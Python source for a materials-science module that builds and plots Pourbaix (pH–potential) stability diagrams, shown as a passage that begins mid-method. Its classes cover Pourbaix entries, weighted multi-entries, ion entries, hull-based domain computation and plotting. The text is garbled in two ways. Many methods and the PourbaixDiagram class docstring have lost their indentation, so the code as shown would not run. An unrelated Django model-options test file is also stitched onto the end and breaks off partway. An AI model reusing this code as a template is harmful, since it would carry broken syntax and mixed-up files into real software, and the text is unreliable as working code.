        return self.energy * self.normalization_factor

    def normalized_energy_at_conditions(self, pH, V):
        """
        Energy at an electrochemical condition, compatible with
        numpy arrays for pH/V input

        Args:
            pH (float): pH at condition
            V (float): applied potential at condition

        Returns:
            energy normalized by number of non-O/H atoms at condition
        """
        return self.energy_at_conditions(pH, V) * self.normalization_factor

    @property
    def conc_term(self):
        """
        Returns the concentration contribution to the free energy
        (PREFAC * log10(concentration)), and should only be present when
        there are ions in the entry (solids have concentration 1.0, making
        this term zero).
        """
        return PREFAC * np.log10(self.concentration)

    # TODO: not sure if these are strictly necessary with refactor
    def as_dict(self):
        """
        Returns dict which contains Pourbaix Entry data.
        Note that the pH, voltage, H2O factors are always calculated when
        constructing a PourbaixEntry object.
        """
        d = {"@module": self.__class__.__module__, "@class": self.__class__.__name__}
        if isinstance(self.entry, IonEntry):
            d["entry_type"] = "Ion"
        else:
            d["entry_type"] = "Solid"
        d["entry"] = self.entry.as_dict()
        d["concentration"] = self.concentration
        d["entry_id"] = self.entry_id
        return d

    @classmethod
    def from_dict(cls, d):
        """
        Invokes a PourbaixEntry from a dictionary
        """
        entry_type = d["entry_type"]
        if entry_type == "Ion":
            entry = IonEntry.from_dict(d["entry"])
        else:
            # Non-ion entries are decoded back into their original
            # MSONable class.
            entry = MontyDecoder().process_decoded(d["entry"])
        entry_id = d["entry_id"]
        concentration = d["concentration"]
        return PourbaixEntry(entry, entry_id, concentration)

    @property
    def normalization_factor(self):
        """
        1 / (number of atoms in the composition that are not H or O).
        """
        # NOTE(review): this divides by zero for compositions made up
        # entirely of H and/or O -- confirm callers never construct such
        # entries.
        return 1.0 / (self.num_atoms - self.composition.get("H", 0) - self.composition.get("O", 0))

    @property
    def composition(self):
        """
        Returns composition of the underlying entry.
        """
        return self.entry.composition

    @property
    def num_atoms(self):
        """
        Return number of atoms in current formula. Useful for normalization
        """
        return self.composition.num_atoms

    def to_pretty_string(self) -> str:
        """
        :return: A pretty string representation (same convention as `name`).
        """
        if self.phase_type == "Solid":
            return self.entry.composition.reduced_formula + "(s)"
        return self.entry.name

    def __repr__(self):
        return "Pourbaix Entry : {} with energy = {:.4f}, npH = {}, nPhi = {}, nH2O = {}, entry_id = {} ".format(
            self.entry.composition,
            self.energy,
            self.npH,
            self.nPhi,
            self.nH2O,
            self.entry_id,
        )

    def __str__(self):
        return self.__repr__()
class MultiEntry(PourbaixEntry):
    """
    PourbaixEntry-like object for constructing multi-elemental Pourbaix
    diagrams. Aggregates a list of component PourbaixEntries with weights;
    most numeric attributes are weight-averaged over the components.
    """
    def __init__(self, entry_list, weights=None):
        """
        Initializes a MultiEntry.
        Args:
            entry_list ([PourbaixEntry]): List of component PourbaixEntries
            weights ([float]): Weights associated with each entry. Default is None
                (all weights 1.0)
        """
        if weights is None:
            self.weights = [1.0] * len(entry_list)
        else:
            self.weights = weights
        self.entry_list = entry_list
    # NOTE(review): lru_cache on an instance method keys on self and keeps
    # every MultiEntry alive for the cache's lifetime (flake8-bugbear B019)
    # — confirm this memory trade-off is intended.
    @lru_cache()
    def __getattr__(self, item):
        """
        Because most of the attributes here are just weighted
        averages of the entry_list, we save some space by
        having a set of conditionals to define the attributes.
        Only called for names not found by normal lookup.
        """
        # Attributes that are weighted averages of entry attributes
        if item in [
            "energy",
            "npH",
            "nH2O",
            "nPhi",
            "conc_term",
            "composition",
            "uncorrected_energy",
        ]:
            # TODO: Composition could be changed for compat with sum
            # "composition" needs an empty Composition as the additive
            # identity; the numeric attributes start from 0.
            if item == "composition":
                start = Composition({})
            else:
                start = 0
            return sum(
                (getattr(e, item) * w for e, w in zip(self.entry_list, self.weights)),
                start,
            )
        # Attributes that are just lists of entry attributes
        if item in ["entry_id", "phase_type"]:
            return [getattr(e, item) for e in self.entry_list]
        # normalization_factor, num_atoms should work from superclass
        return self.__getattribute__(item)
    @property
    def name(self):
        """
        MultiEntry name, i. e. the name of each entry joined by ' + '
        """
        return " + ".join([e.name for e in self.entry_list])
    def __repr__(self):
        # Aggregated (weight-averaged) quantities plus the joined species names
        return (
            "Multiple Pourbaix Entry: energy = {:.4f}, npH = {}, nPhi = {}, "
            "nH2O = {}, entry_id = {}, species: {}".format(
                self.energy, self.npH, self.nPhi, self.nH2O, self.entry_id, self.name
            )
        )
    def __str__(self):
        return self.__repr__()
    def as_dict(self):
        """
        Returns: MSONable dict storing the component entries and weights.
        """
        return {
            "@module": self.__class__.__module__,
            "@class": self.__class__.__name__,
            "entry_list": [e.as_dict() for e in self.entry_list],
            "weights": self.weights,
        }
    @classmethod
    def from_dict(cls, d):
        """
        Args:
            d (): Dict representation produced by as_dict()
        Returns:
            MultiEntry
        """
        entry_list = [PourbaixEntry.from_dict(e) for e in d.get("entry_list")]
        return cls(entry_list, d.get("weights"))
# TODO: this class isn't particularly useful in its current form, could be
# refactored to include information about the reference solid
class IonEntry(PDEntry):
    """
    Object similar to PDEntry, but contains an Ion object instead of a
    Composition object.
    .. attribute:: name
        A name for the entry. This is the string shown in the phase diagrams.
        By default, this is the reduced formula for the composition, but can be
        set to some other string for display purposes.
    """
    def __init__(self, ion, energy, name=None, attribute=None):
        """
        Args:
            ion: Ion object
            energy: Energy for composition.
            name: Optional parameter to name the entry. Defaults to the
                chemical formula.
            attribute: Optional attribute of the entry, forwarded to PDEntry.
        """
        self.ion = ion
        # Auto-assign name from the ion's reduced formula when not provided
        name = name if name else self.ion.reduced_formula
        super().__init__(composition=ion.composition, energy=energy, name=name, attribute=attribute)
    @classmethod
    def from_dict(cls, d):
        """
        Returns an IonEntry object from a dict.
        """
        # Use cls rather than a hard-coded IonEntry so subclasses
        # round-trip through as_dict/from_dict correctly.
        return cls(Ion.from_dict(d["ion"]), d["energy"], d.get("name"), d.get("attribute"))
    def as_dict(self):
        """
        Creates a dict of composition, energy, and ion name
        """
        d = {"ion": self.ion.as_dict(), "energy": self.energy, "name": self.name}
        return d
    def __repr__(self):
        return f"IonEntry : {self.composition} with energy = {self.energy:.4f}"
    def __str__(self):
        return self.__repr__()
def ion_or_solid_comp_object(formula):
    """
    Construct either an Ion object or a Composition object from a
    formula string.
    Args:
        formula: String formula. Eg. of ion: NaOH(aq), Na[+];
            Eg. of solid: Fe2O3(s), Fe(s), Na2O
    Returns:
        Composition/Ion object
    """
    # A bracketed charge (e.g. Na[+]) or an "(aq)" suffix marks an ion
    if re.search(r"\[([^\[\]]+)\]|\(aq\)", formula):
        return Ion.from_formula(formula)
    # Strip the trailing "(s)" solid marker before parsing
    if re.search(r"\(s\)", formula):
        return Composition(formula[:-3])
    return Composition(formula)
# H and O are treated specially (solvent/reference species) and excluded
# from pourbaix composition bookkeeping throughout this module.
ELEMENTS_HO = {Element("H"), Element("O")}
# TODO: the solids filter breaks some of the functionality of the
# heatmap plotter, because the reference states for decomposition
# don't include oxygen/hydrogen in the OER/HER regions
# TODO: create a from_phase_diagram class method for non-formation energy
# invocation
# TODO: invocation from a MultiEntry entry list could be a bit more robust
# TODO: serialization is still a bit rough around the edges
class PourbaixDiagram(MSONable):
"""
Class to create a Pourbaix diagram from entries
"""
    def __init__(
        self,
        entries: Union[List[PourbaixEntry], List[MultiEntry]],
        comp_dict: Optional[Dict[str, float]] = None,
        conc_dict: Optional[Dict[str, float]] = None,
        filter_solids: bool = True,
        nproc: Optional[int] = None,
    ):
        """
        Args:
            entries ([PourbaixEntry] or [MultiEntry]): Entries list
                containing Solids and Ions or a list of MultiEntries
            comp_dict ({str: float}): Dictionary of compositions,
                defaults to equal parts of each elements
            conc_dict ({str: float}): Dictionary of ion concentrations,
                defaults to 1e-6 for each element
            filter_solids (bool): applying this filter to a Pourbaix
                diagram ensures all included solid phases are filtered by
                stability on the compositional phase diagram. Defaults to True.
                The practical consequence of this is that highly oxidized or reduced
                phases that might show up in experiments due to kinetic limitations
                on oxygen/hydrogen evolution won't appear in the diagram, but they are
                not actually "stable" (and are frequently overstabilized from DFT errors).
                Hence, including only the stable solid phases generally leads to the
                most accurate Pourbaix diagrams.
            nproc (int): number of processes to generate multientries with
                in parallel. Defaults to None (serial processing)

        Raises:
            ValueError: if a multi-element ion lacks a concentration, or if
                any entry has a phase type other than "Solid"/"Ion".
        """
        # Copy so that concentration overrides below don't mutate caller data
        entries = deepcopy(entries)
        self.filter_solids = filter_solids
        # Get non-OH elements
        self.pbx_elts = list(
            set(itertools.chain.from_iterable([entry.composition.elements for entry in entries])) - ELEMENTS_HO
        )
        # Compositional dimension: number of non-H/O elements minus one
        self.dim = len(self.pbx_elts) - 1
        # Process multientry inputs
        if isinstance(entries[0], MultiEntry):
            self._processed_entries = entries
            # Extract individual entries
            single_entries = list(set(itertools.chain.from_iterable([e.entry_list for e in entries])))
            self._unprocessed_entries = single_entries
            self._filtered_entries = single_entries
            self._conc_dict = None
            self._elt_comp = {k: v for k, v in entries[0].composition.items() if k not in ELEMENTS_HO}
            self._multielement = True
        # Process single entry inputs
        else:
            # Set default conc/comp dicts
            if not comp_dict:
                comp_dict = {elt.symbol: 1.0 / len(self.pbx_elts) for elt in self.pbx_elts}
            if not conc_dict:
                conc_dict = {elt.symbol: 1e-6 for elt in self.pbx_elts}
            self._conc_dict = conc_dict
            self._elt_comp = comp_dict
            self.pourbaix_elements = self.pbx_elts
            solid_entries = [entry for entry in entries if entry.phase_type == "Solid"]
            ion_entries = [entry for entry in entries if entry.phase_type == "Ion"]
            # If a conc_dict is specified, override individual entry concentrations
            for entry in ion_entries:
                ion_elts = list(set(entry.composition.elements) - ELEMENTS_HO)
                # TODO: the logic here for ion concentration setting is in two
                # places, in PourbaixEntry and here, should be consolidated
                if len(ion_elts) == 1:
                    entry.concentration = conc_dict[ion_elts[0].symbol] * entry.normalization_factor
                elif len(ion_elts) > 1 and not entry.concentration:
                    raise ValueError("Elemental concentration not compatible with multi-element ions")
            self._unprocessed_entries = solid_entries + ion_entries
            if not len(solid_entries + ion_entries) == len(entries):
                raise ValueError("All supplied entries must have a phase type of " 'either "Solid" or "Ion"')
            if self.filter_solids:
                # O is 2.46 b/c pbx entry finds energies referenced to H2O
                entries_HO = [ComputedEntry("H", 0), ComputedEntry("O", 2.46)]
                solid_pd = PhaseDiagram(solid_entries + entries_HO)
                # Keep only solids on the compositional convex hull
                solid_entries = list(set(solid_pd.stable_entries) - set(entries_HO))
            self._filtered_entries = solid_entries + ion_entries
            if len(comp_dict) > 1:
                self._multielement = True
                self._processed_entries = self._preprocess_pourbaix_entries(self._filtered_entries, nproc=nproc)
            else:
                self._processed_entries = self._filtered_entries
                self._multielement = False
        # Stable pH-V domains are computed once, eagerly, at construction
        self._stable_domains, self._stable_domain_vertices = self.get_pourbaix_domains(self._processed_entries)
def _convert_entries_to_points(self, pourbaix_entries):
"""
Args:
pourbaix_entries ([PourbaixEntry]): list of pourbaix entries
to process into vectors in nph-nphi-composition space
Returns:
list of vectors, [[nph, nphi, e0, x1, x2, ..., xn-1]]
corresponding to each entry in nph-nphi-composition space
"""
vecs = [
[entry.npH, entry.nPhi, entry.energy] + [entry.composition.get(elt) for elt in self.pbx_elts[:-1]]
for entry in pourbaix_entries
]
vecs = np.array(vecs)
norms = np.transpose([[entry.normalization_factor for entry in pourbaix_entries]])
vecs *= norms
return vecs
    def _get_hull_in_nph_nphi_space(self, entries):
        """
        Generates convex hull of pourbaix diagram entries in composition,
        npH, and nphi space. This enables filtering of multi-entries
        such that only compositionally stable combinations of entries
        are included.
        Args:
            entries ([PourbaixEntry]): list of PourbaixEntries to construct
                the convex hull
        Returns: list of entries and stable facets corresponding to that
            list of entries
        """
        ion_entries = [entry for entry in entries if entry.phase_type == "Ion"]
        solid_entries = [entry for entry in entries if entry.phase_type == "Solid"]
        # Pre-filter solids based on min at each composition
        logger.debug("Pre-filtering solids by min energy at each composition")
        sorted_entries = sorted(
            solid_entries,
            key=lambda x: (x.composition.reduced_composition, x.entry.energy_per_atom),
        )
        # groupby requires the pre-sort above on the identical key
        grouped_by_composition = itertools.groupby(sorted_entries, key=lambda x: x.composition.reduced_composition)
        min_entries = [list(grouped_entries)[0] for comp, grouped_entries in grouped_by_composition]
        min_entries += ion_entries
        logger.debug("Constructing nph-nphi-composition points for qhull")
        vecs = self._convert_entries_to_points(min_entries)
        maxes = np.max(vecs[:, :3], axis=0)
        # Extra point placed well above all entries so the hull is bounded
        # from the top; its facets are discarded below
        extra_point = np.concatenate([maxes, np.ones(self.dim) / self.dim], axis=0)
        # Add padding for extra point
        pad = 1000
        extra_point[2] += pad
        points = np.concatenate([vecs, np.array([extra_point])], axis=0)
        logger.debug("Constructing convex hull in nph-nphi-composition space")
        # "QJ" joggles the input to sidestep degenerate-geometry failures
        hull = ConvexHull(points, qhull_options="QJ i")
        # Create facets and remove top
        facets = [facet for facet in hull.simplices if not len(points) - 1 in facet]
        if self.dim > 1:
            logger.debug("Filtering facets by pourbaix composition")
            valid_facets = []
            for facet in facets:
                comps = vecs[facet][:, 3:]
                # Recover the implicit last-element fraction so rows sum to 1
                full_comps = np.concatenate([comps, 1 - np.sum(comps, axis=1).reshape(len(comps), 1)], axis=1)
                # Ensure an compositional interior point exists in the simplex
                if np.linalg.matrix_rank(full_comps) > self.dim:
                    valid_facets.append(facet)
        else:
            valid_facets = facets
        return min_entries, valid_facets
def _preprocess_pourbaix_entries(self, entries, nproc=None):
"""
Generates multi-entries for pourbaix diagram
Args:
entries ([PourbaixEntry]): list of PourbaixEntries to preprocess
into MultiEntries
nproc (int): number of processes to be used in parallel
treatment of entry combos
Returns:
([MultiEntry]) list of stable MultiEntry candidates
"""
# Get composition
tot_comp = Composition(self._elt_comp)
min_entries, valid_facets = self._get_hull_in_nph_nphi_space(entries)
combos = []
for facet in valid_facets:
for i in range(1, self.dim + 2):
these_combos = []
for combo in itertools.combinations(facet, i):
these_entries = [min_entries[i] for i in combo]
these_combos.append(frozenset(these_entries))
combos.append(these_combos)
all_combos = set(itertools.chain.from_iterable(combos))
list_combos = []
for i in all_combos:
list_combos.append(list(i))
all_combos = list_combos
multi_entries = []
# Parallel processing of multi-entry generation
if nproc is not None:
f = partial(self.process_multientry, prod_comp=tot_comp)
with Pool(nproc) as p:
multi_entries = list(p.imap(f, all_combos))
multi_entries = list(filter(bool, multi_entries))
else:
# Serial processing of multi-entry generation
for combo in all_combos:
multi_entry = self.process_multientry(combo, prod_comp=tot_comp)
if multi_entry:
multi_entries.append(multi_entry)
return multi_entries
    def _generate_multielement_entries(self, entries, nproc=None):
        """
        Create entries for multi-element Pourbaix construction.
        This works by finding all possible linear combinations
        of entries that can result in the specified composition
        from the initialized comp_dict.
        Args:
            entries ([PourbaixEntries]): list of pourbaix entries
                to process into MultiEntries
            nproc (int): number of processes to be used in parallel
                treatment of entry combos
        Returns:
            ([MultiEntry]) valid multi-entries for the target composition
        """
        N = len(self._elt_comp)  # No. of elements
        total_comp = Composition(self._elt_comp)
        # generate all combinations of compounds that have all elements
        entry_combos = [itertools.combinations(entries, j + 1) for j in range(N)]
        entry_combos = itertools.chain.from_iterable(entry_combos)
        # Lazy filter: keep only combos whose combined composition covers
        # the target composition
        entry_combos = filter(lambda x: total_comp < MultiEntry(x).composition, entry_combos)
        # Generate and filter entries
        processed_entries = []
        total = sum(comb(len(entries), j + 1) for j in range(N))
        if total > 1e6:
            warnings.warn(f"Your pourbaix diagram includes {total} entries and may take a long time to generate.")
        # Parallel processing of multi-entry generation
        if nproc is not None:
            f = partial(self.process_multientry, prod_comp=total_comp)
            with Pool(nproc) as p:
                processed_entries = list(p.imap(f, entry_combos))
            # Drop combos for which no valid reaction was found (None results)
            processed_entries = list(filter(bool, processed_entries))
        # Serial processing of multi-entry generation
        else:
            for entry_combo in entry_combos:
                processed_entry = self.process_multientry(entry_combo, total_comp)
                if processed_entry is not None:
                    processed_entries.append(processed_entry)
        return processed_entries
    @staticmethod
    def process_multientry(entry_list, prod_comp, coeff_threshold=1e-4):
        """
        Static method for finding a multientry based on
        a list of entries and a product composition.
        Essentially checks to see if a valid aqueous
        reaction exists between the entries and the
        product composition and returns a MultiEntry
        with weights according to the coefficients if so.
        Args:
            entry_list ([Entry]): list of entries from which to
                create a MultiEntry
            prod_comp (Composition): composition constraint for setting
                weights of MultiEntry
            coeff_threshold (float): threshold of stoichiometric
                coefficients to filter, if weights are lower than
                this value, the entry is not returned
        Returns:
            (MultiEntry or None): MultiEntry weighted by the balanced
            reaction coefficients, or None if no valid reaction exists
        """
        # H and O are free to balance the reaction (aqueous environment)
        dummy_oh = [Composition("H"), Composition("O")]
        try:
            # Get balanced reaction coeffs, ensuring all < 0 or conc thresh
            # Note that we get reduced compositions for solids and non-reduced
            # compositions for ions because ions aren't normalized due to
            # their charge state.
            entry_comps = [e.composition for e in entry_list]
            rxn = Reaction(entry_comps + dummy_oh, [prod_comp])
            # Reactant coefficients are negated so that "consumed" = positive
            react_coeffs = [-rxn.get_coeff(comp) for comp in entry_comps]
            all_coeffs = react_coeffs + [rxn.get_coeff(prod_comp)]
            # Check if reaction coeff threshold met for pourbaix compounds
            # All reactant/product coefficients must be positive nonzero
            if all(coeff > coeff_threshold for coeff in all_coeffs):
                return MultiEntry(entry_list, weights=react_coeffs)
            return None
        except ReactionError:
            # No balanced reaction exists for this combination
            return None
    @staticmethod
    def get_pourbaix_domains(pourbaix_entries, limits=None):
        """
        Returns a set of pourbaix stable domains (i. e. polygons) in
        pH-V space from a list of pourbaix_entries
        This function works by using scipy's HalfspaceIntersection
        function to construct all of the 2-D polygons that form the
        boundaries of the planes corresponding to individual entry
        gibbs free energies as a function of pH and V. Hyperplanes
        of the form a*pH + b*V + 1 - g(0, 0) are constructed and
        supplied to HalfspaceIntersection, which then finds the
        boundaries of each pourbaix region using the intersection
        points.
        Args:
            pourbaix_entries ([PourbaixEntry]): Pourbaix entries
                with which to construct stable pourbaix domains
            limits ([[float]]): limits in which to do the pourbaix
                analysis
        Returns:
            Returns a dict of the form {entry: [boundary_points]}.
            The list of boundary points are the sides of the N-1
            dim polytope bounding the allowable ph-V range of each entry.
        """
        if limits is None:
            limits = [[-2, 16], [-4, 4]]
        # Get hyperplanes
        # Each row is [a, b, c, d] for a*pH + b*V + c*g + d <= 0
        hyperplanes = [
            np.array([-PREFAC * entry.npH, -entry.nPhi, 0, -entry.energy]) * entry.normalization_factor
            for entry in pourbaix_entries
        ]
        hyperplanes = np.array(hyperplanes)
        # Coefficient of the energy axis is 1 for every entry plane
        hyperplanes[:, 2] = 1
        max_contribs = np.max(np.abs(hyperplanes), axis=0)
        g_max = np.dot(-max_contribs, [limits[0][1], limits[1][1], 0, 1])
        # Add border hyperplanes and generate HalfspaceIntersection
        border_hyperplanes = [
            [-1, 0, 0, limits[0][0]],
            [1, 0, 0, -limits[0][1]],
            [0, -1, 0, limits[1][0]],
            [0, 1, 0, -limits[1][1]],
            [0, 0, -1, 2 * g_max],
        ]
        hs_hyperplanes = np.vstack([hyperplanes, border_hyperplanes])
        # Interior point: center of the pH/V window at the g_max level
        interior_point = np.average(limits, axis=1).tolist() + [g_max]
        hs_int = HalfspaceIntersection(hs_hyperplanes, np.array(interior_point))
        # organize the boundary points by entry
        pourbaix_domains = {entry: [] for entry in pourbaix_entries}
        for intersection, facet in zip(hs_int.intersections, hs_int.dual_facets):
            for v in facet:
                # Indices >= len(pourbaix_entries) belong to the border planes
                if v < len(pourbaix_entries):
                    this_entry = pourbaix_entries[v]
                    pourbaix_domains[this_entry].append(intersection)
        # Remove entries with no pourbaix region
        pourbaix_domains = {k: v for k, v in pourbaix_domains.items() if v}
        pourbaix_domain_vertices = {}
        for entry, points in pourbaix_domains.items():
            # Keep only the pH/V coordinates, dropping the energy axis
            points = np.array(points)[:, :2]
            # Initial sort to ensure consistency
            points = points[np.lexsort(np.transpose(points))]
            center = np.average(points, axis=0)
            points_centered = points - center
            # Sort points by cross product of centered points,
            # isn't strictly necessary but useful for plotting tools
            points_centered = sorted(points_centered, key=cmp_to_key(lambda x, y: x[0] * y[1] - x[1] * y[0]))
            points = points_centered + center
            # Create simplices corresponding to pourbaix boundary
            simplices = [Simplex(points[indices]) for indices in ConvexHull(points).simplices]
            pourbaix_domains[entry] = simplices
            pourbaix_domain_vertices[entry] = points
        return pourbaix_domains, pourbaix_domain_vertices
def find_stable_entry(self, pH, V):
"""
Finds stable entry at a pH,V condition
Args:
pH (float): pH to find stable entry
V (float): V to find stable entry
Returns:
"""
energies_at_conditions = [e.normalized_energy_at_conditions(pH, V) for e in self.stable_entries]
return self.stable_entries[np.argmin(energies_at_conditions)]
    def get_decomposition_energy(self, entry, pH, V):
        """
        Finds decomposition to most stable entries in eV/atom,
        supports vectorized inputs for pH and V
        Args:
            entry (PourbaixEntry): PourbaixEntry corresponding to
                compound to find the decomposition for
            pH (float, [float]): pH at which to find the decomposition
            V (float, [float]): voltage at which to find the decomposition
        Returns:
            Decomposition energy for the entry, i. e. the energy above
            the "pourbaix hull" in eV/atom at the given conditions
        Raises:
            ValueError: if the entry's non-H/O composition does not match
                the diagram's composition
        """
        # Check composition consistency between entry and Pourbaix diagram:
        pbx_comp = Composition(self._elt_comp).fractional_composition
        entry_pbx_comp = Composition(
            {elt: coeff for elt, coeff in entry.composition.items() if elt not in ELEMENTS_HO}
        ).fractional_composition
        if entry_pbx_comp != pbx_comp:
            raise ValueError("Composition of stability entry does not match Pourbaix Diagram")
        entry_normalized_energy = entry.normalized_energy_at_conditions(pH, V)
        hull_energy = self.get_hull_energy(pH, V)
        decomposition_energy = entry_normalized_energy - hull_energy
        # Convert to eV/atom instead of eV/normalized formula unit
        # (undo the per-non-H/O-atom normalization, then divide by the
        # total atom count)
        decomposition_energy /= entry.normalization_factor
        decomposition_energy /= entry.composition.num_atoms
        return decomposition_energy
def get_hull_energy(self, pH, V):
"""
Gets the minimum energy of the pourbaix "basin" that is formed
from the stable pourbaix planes. Vectorized.
Args:
pH (float or [float]): pH at which to find the hull energy
V (float or [float]): V at which to find the hull energy
Returns:
(float or [float]) minimum pourbaix energy at conditions
"""
all_gs = np.array([e.normalized_energy_at_conditions(pH, V) for e in self.stable_entries])
base = np.min(all_gs, axis=0)
return base
def get_stable_entry(self, pH, V):
"""
Gets the stable entry at a given pH, V condition
Args:
pH (float): pH at a given condition
V (float): V at a given condition
Returns:
(PourbaixEntry or MultiEntry): pourbaix or multi-entry
corresponding ot the minimum energy entry at a given
pH, V condition
"""
all_gs = np.array([e.normalized_energy_at_conditions(pH, V) for e in self.stable_entries])
return self.stable_entries[np.argmin(all_gs)]
@property
def stable_entries(self):
"""
Returns the stable entries in the Pourbaix diagram.
"""
return list(self._stable_domains.keys())
@property
def unstable_entries(self):
"""
Returns all unstable entries in the Pourbaix diagram
"""
return [e for e in self.all_entries if e not in self.stable_entries]
    @property
    def all_entries(self):
        """
        Return all (processed) entries used to generate the pourbaix diagram.
        """
        return self._processed_entries
    @property
    def unprocessed_entries(self):
        """
        Return the raw single entries supplied before multi-entry processing.
        """
        return self._unprocessed_entries
def as_dict(self, include_unprocessed_entries=None):
"""
Args:
include_unprocessed_entries (): DEPRECATED. Whether to include unprocessed
entries (equivalent to filter_solids=False). Serialization now includes
all unprocessed entries by default. Set filter_solids=False before
serializing to include unstable solids from the generated Pourbaix Diagram.
Returns:
MSONable dict.
"""
if include_unprocessed_entries:
warnings.warn(
DeprecationWarning(
"The include_unprocessed_entries kwarg is deprecated! "
"Set filter_solids=True / False before serializing instead."
)
)
d = {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"entries": [e.as_dict() for e in self._unprocessed_entries],
"comp_dict": self._elt_comp,
"conc_dict": self._conc_dict,
"filter_solids": self.filter_solids,
}
return d
@classmethod
def from_dict(cls, d):
"""
Args:
d (): Dict representation.
Returns:
PourbaixDiagram
"""
decoded_entries = MontyDecoder().process_decoded(d["entries"])
return cls(decoded_entries, d.get("comp_dict"), d.get("conc_dict"), d.get("filter_solids"))
class PourbaixPlotter:
"""
A plotter class for phase diagrams.
"""
    def __init__(self, pourbaix_diagram):
        """
        Args:
            pourbaix_diagram (PourbaixDiagram): A PourbaixDiagram object.
        """
        # Plotting methods read the diagram's precomputed domain vertices
        # and decomposition energies.
        self._pbx = pourbaix_diagram
def show(self, *args, **kwargs):
"""
Shows the pourbaix plot
Args:
*args: args to get_pourbaix_plot
**kwargs: kwargs to get_pourbaix_plot
Returns:
None
"""
plt = self.get_pourbaix_plot(*args, **kwargs)
plt.show()
    def get_pourbaix_plot(self, limits=None, title="", label_domains=True, plt=None):
        """
        Plot Pourbaix diagram.
        Args:
            limits: 2D list containing limits of the Pourbaix diagram
                of the form [[xlo, xhi], [ylo, yhi]]
            title (str): Title to display on plot
            label_domains (bool): whether to label pourbaix domains
            plt (pyplot): Pyplot instance for plotting
        Returns:
            plt (pyplot) - matplotlib plot object with pourbaix diagram
        """
        if limits is None:
            limits = [[-2, 16], [-3, 3]]
        plt = plt or pretty_plot(16)
        xlim = limits[0]
        ylim = limits[1]
        # Reference lines: h_line at slope -PREFAC, o_line offset by +1.23 V,
        # the neutral pH = 7 line, and the V = 0 line
        h_line = np.transpose([[xlim[0], -xlim[0] * PREFAC], [xlim[1], -xlim[1] * PREFAC]])
        o_line = np.transpose([[xlim[0], -xlim[0] * PREFAC + 1.23], [xlim[1], -xlim[1] * PREFAC + 1.23]])
        neutral_line = np.transpose([[7, ylim[0]], [7, ylim[1]]])
        V0_line = np.transpose([[xlim[0], 0], [xlim[1], 0]])
        ax = plt.gca()
        ax.set_xlim(xlim)
        ax.set_ylim(ylim)
        lw = 3
        plt.plot(h_line[0], h_line[1], "r--", linewidth=lw)
        plt.plot(o_line[0], o_line[1], "r--", linewidth=lw)
        plt.plot(neutral_line[0], neutral_line[1], "k-.", linewidth=lw)
        plt.plot(V0_line[0], V0_line[1], "k-.", linewidth=lw)
        # Outline each stable domain and label it at its centroid
        for entry, vertices in self._pbx._stable_domain_vertices.items():
            center = np.average(vertices, axis=0)
            x, y = np.transpose(np.vstack([vertices, vertices[0]]))
            plt.plot(x, y, "k-", linewidth=lw)
            if label_domains:
                # NOTE(review): Annotation.draggable() is deprecated in newer
                # matplotlib in favor of set_draggable() — confirm the pinned
                # matplotlib version still supports it.
                plt.annotate(
                    generate_entry_label(entry),
                    center,
                    ha="center",
                    va="center",
                    fontsize=20,
                    color="b",
                ).draggable()
        plt.xlabel("pH")
        plt.ylabel("E (V)")
        plt.title(title, fontsize=20, fontweight="bold")
        return plt
    def plot_entry_stability(
        self,
        entry,
        pH_range=None,
        pH_resolution=100,
        V_range=None,
        V_resolution=100,
        e_hull_max=1,
        cmap="RdYlBu_r",
        **kwargs,
    ):
        """
        Plot the stability of an entry, i.e. its decomposition energy
        relative to the pourbaix hull, as a heatmap over the diagram.
        Args:
            entry (PourbaixEntry): entry for which the stability map is drawn
            pH_range ([float]): [min, max] pH range; defaults to [-2, 16]
            pH_resolution (int): number of pH grid points; defaults to 100
            V_range ([float]): [min, max] voltage range; defaults to [-3, 3]
            V_resolution (int): number of voltage grid points; defaults to 100
            e_hull_max (float): upper bound of the stability colorbar (eV/atom)
            cmap (str): matplotlib colormap name for the stability map
            **kwargs (): additional kwargs passed through to get_pourbaix_plot
        Returns:
            plt (pyplot): matplotlib plot object with the stability heatmap
        """
        if pH_range is None:
            pH_range = [-2, 16]
        if V_range is None:
            V_range = [-3, 3]
        # plot the Pourbaix diagram
        plt = self.get_pourbaix_plot(**kwargs)
        # Dense pH/V grid (complex step count = number of samples in mgrid)
        pH, V = np.mgrid[
            pH_range[0] : pH_range[1] : pH_resolution * 1j,
            V_range[0] : V_range[1] : V_resolution * 1j,
        ]
        stability = self._pbx.get_decomposition_energy(entry, pH, V)
        # Plot stability map
        plt.pcolor(pH, V, stability, cmap=cmap, vmin=0, vmax=e_hull_max)
        cbar = plt.colorbar()
        cbar.set_label(f"Stability of {generate_entry_label(entry)} (eV/atom)")
        # Set ticklabels
        # ticklabels = [t.get_text() for t in cbar.ax.get_yticklabels()]
        # ticklabels[-1] = '>={}'.format(ticklabels[-1])
        # cbar.ax.set_yticklabels(ticklabels)
        return plt
    def domain_vertices(self, entry):
        """
        Returns the vertices of the Pourbaix domain.
        Args:
            entry: Entry for which domain vertices are desired
        Returns:
            list of vertices (pH, V points bounding the entry's domain)
        Raises:
            KeyError: if the entry has no stable domain in the diagram
        """
        return self._pbx._stable_domain_vertices[entry]
def generate_entry_label(entry):
    """
    Generates a label for the pourbaix plotter
    Args:
        entry (PourbaixEntry or MultiEntry): entry to get a label for
    """
    if isinstance(entry, MultiEntry):
        return " + ".join(e.name for e in entry.entry_list)
    # TODO - a more elegant solution could be added later to Stringify
    # for example, the pattern re.sub(r"([-+][\d\.]*)", r"$^{\1}$", )
    # will convert B(OH)4- to B(OH)$_4^-$.
    # for this to work, the ion's charge always must be written AFTER
    # the sign (e.g., Fe+2 not Fe2+)
    # Superscript any bracketed charge token, e.g. "[2+]" -> "$^{2+}$"
    return re.sub(r"()\[([^)]*)\]", r"\1$^{\2}$", entry.to_latex_string())
| |
from django.apps import apps
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.core.exceptions import FieldDoesNotExist
from django.db.models.fields import related, CharField, Field
from django.db.models.options import IMMUTABLE_WARNING, EMPTY_RELATION_TREE
from django.test import TestCase
from .models import Relation, AbstractPerson, BasePerson, Person, ProxyPerson, Relating
from .results import TEST_RESULTS
class OptionsBaseTests(TestCase):
    """Shared helpers for inspecting Model._meta field/relation results."""

    def _map_related_query_names(self, res):
        # Pair each relation's query name with its associated model.
        return tuple((rel.name, model) for rel, model in res)

    def _map_names(self, res):
        return tuple((field.name, model) for field, model in res)

    def _model(self, current_model, field):
        # None signals "defined on the model under test itself".
        concrete = field.model._meta.concrete_model
        return None if concrete == current_model else concrete

    def _details(self, current_model, relation):
